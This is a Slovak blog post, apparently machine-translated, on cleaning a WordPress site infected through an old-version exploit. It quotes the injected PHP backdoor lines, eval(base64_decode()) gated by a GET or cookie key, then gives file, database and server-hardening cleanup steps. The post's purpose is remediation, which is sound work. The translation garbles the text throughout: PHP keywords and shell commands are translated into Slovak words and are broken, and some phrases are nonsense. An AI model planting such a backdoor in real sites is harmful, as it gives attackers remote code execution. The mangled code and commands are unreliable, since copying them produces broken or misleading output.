Predtým, ako si prečítate tento príspevok, musíte vidieť Príspevok tu, niečo pochopiť. :)
Našiel som v niekoľkých súboroch blogov na stránke Stealthsetts.com, kódy podobné tým nižšie, ktoré sa objavili v dôsledku vírusu s exploitul de wordpress.:
<? php ak ($ _ get [‘573Abcb060974771 '] ==”8e96d1b4b674e1d2″) {eval (base64_decode ($ _ post [‘file '])); VÝCHOD; }?>
a
<? php ak ($ _ cookie [44E827F9FBeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘file '])); VÝCHOD; }?>
Vo vyššie uvedenom prípade ide o súbor xmlrpc.php z Ospalý, ale na a vyraziť Na serveri vidíte, že v zdrojoch je dosť veľa kódov svojho druhu.
Čistenie infikovaných súborov:
Ooookkkkyouak
1. Najlepšie riešenie, po tom, čo sa to stane zálohaa čistá databáza je jeho Vymazať súbory WordPress (Môžete si ponechať WP-Config.php a súbory, ktoré nie sú striktne pre platformu WP po ich starostlivom skontrolovaní) zo servera a odovzdávajte do pôvodných súborov vo verzii 2.5.1 (Pri tejto príležitosti tiež urobíte aktualizáciu verzie WP :)): http://wordpress.org/download/ . Odstráňte súbory témy vrátane prípadu, že neveríte, že môžete vykonať starostlivú kontrolu.
Je zrejmé, že súbory tém, ktoré sa na blogu nikdy nepoužili, boli ovplyvnené jednoduchou zmenou témy, tento problém nevyrieši.
./andreea/wp-content/themes/default/index.php:<? php ak ($ _ cookie [44E827F9FBeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘file '])); VÝCHOD; }?><? php get_header (); ?>
2. Vyhľadajte a odstráňte všetky súbory obsahujúce: *_new.php, *_old.php, *.jpgg, *.giff, *.pngg a wp-info.txt súbor, ak existuje.
nájsť. -nament “*_New.php”
nájsť. -nament “*_old.php”
nájsť. -nament “*.jpgg”
nájsť. -nament “* _giff”
nájsť. -nament “*_pngg”
nájsť. -nament “wp-info.txt”
3 v /TMP , vyhľadávať a odstraňovať priečinky ako TMPYWBZT2
Čistenie SQL :
1. V tabuľke tabuľky wp_options Uvidíte, či existuje a odstráňte riadky: internal_links_cache, ris_f541b3abd05e7962fcab37737f40fad8 a wordpress_options.
2. Tiež vo WP_Options, choďte na Active_plugins A odstráňte, ak existuje, doplnok, ktorý končí jedným z rozšírení *_new.php, *_old.php, *.jpgg, *.giff, *.pngg alebo ak je to ďalšie podozrivé rozšírenie, skontrolujte starostlivo.
3. V tabuľke wp_users, Zistite, či existuje používateľ, ktorý nemá čo písať vedľa neho, v stĺpci používateľské meno. Odstráňte tohto používateľa, ale zadajte číslo v stĺpci ID. Tento používateľ je možné použiť „WordPress“ ako user_login A zdá sa, že je vytvorený na 00:00 0000-00-00.
4. Prejdite k stolu wp_usermeta a vymažte všetky riadky, ktoré patria k ID vyššie.
Po vykonaní tohto čistenia SQL, deaktivujte a potom aktivujte nejaký doplnok. (V blogu -> Prístrojová doska -> Doplnky)
Securizácia servera:
1. Pozrite sa, ktoré adresáre a súbory sú “zapisovateľný„(CHMOD 777) a skúste ich nasadiť a chmod čo im už neumožní písať z akejkoľvek úrovne. (Napríklad CHMOD 644)
nájsť. -Perm -2 –LS
2. Pozrite sa, aké súbory nastavili bit na juh alebo korčuľovanie . Ak tieto súbory nepoužívate na ne vložené chmod 0 alebo odinštalujte balík, ktorý obsahuje. Sú veľmi nebezpeční, pretože vystupujú s privilégiami “zoskupenie„Alebo“zakorenenie„A nie s privilégiami normálneho používateľa, ktorý tento súbor vykoná.
nájsť / -type f -perm -04000 -ls
nájsť / -type f -perm -02000 -ls
3. Skontrolujte, ktoré porty sú otvorené, a pokúste sa zatvoriť alebo zabezpečiť tie, ktoré sa nepoužívajú.
Netstat -an | uchopovací zoznam
To je o tom. Vidím to Niektoré blogy sú Banate Hľadám Google a iní hovoria: „Urobili ich !!!“ . No, urobili by ich ... ale čo hovoríš, ak Google začne peniaze všetky stránky Kto robia Spam a trójske kone (Trójsky) v cookies?
1 myslel na „Vykorisťovať WordPress – Čistenie vírusových súborov, SQL a Server Security.”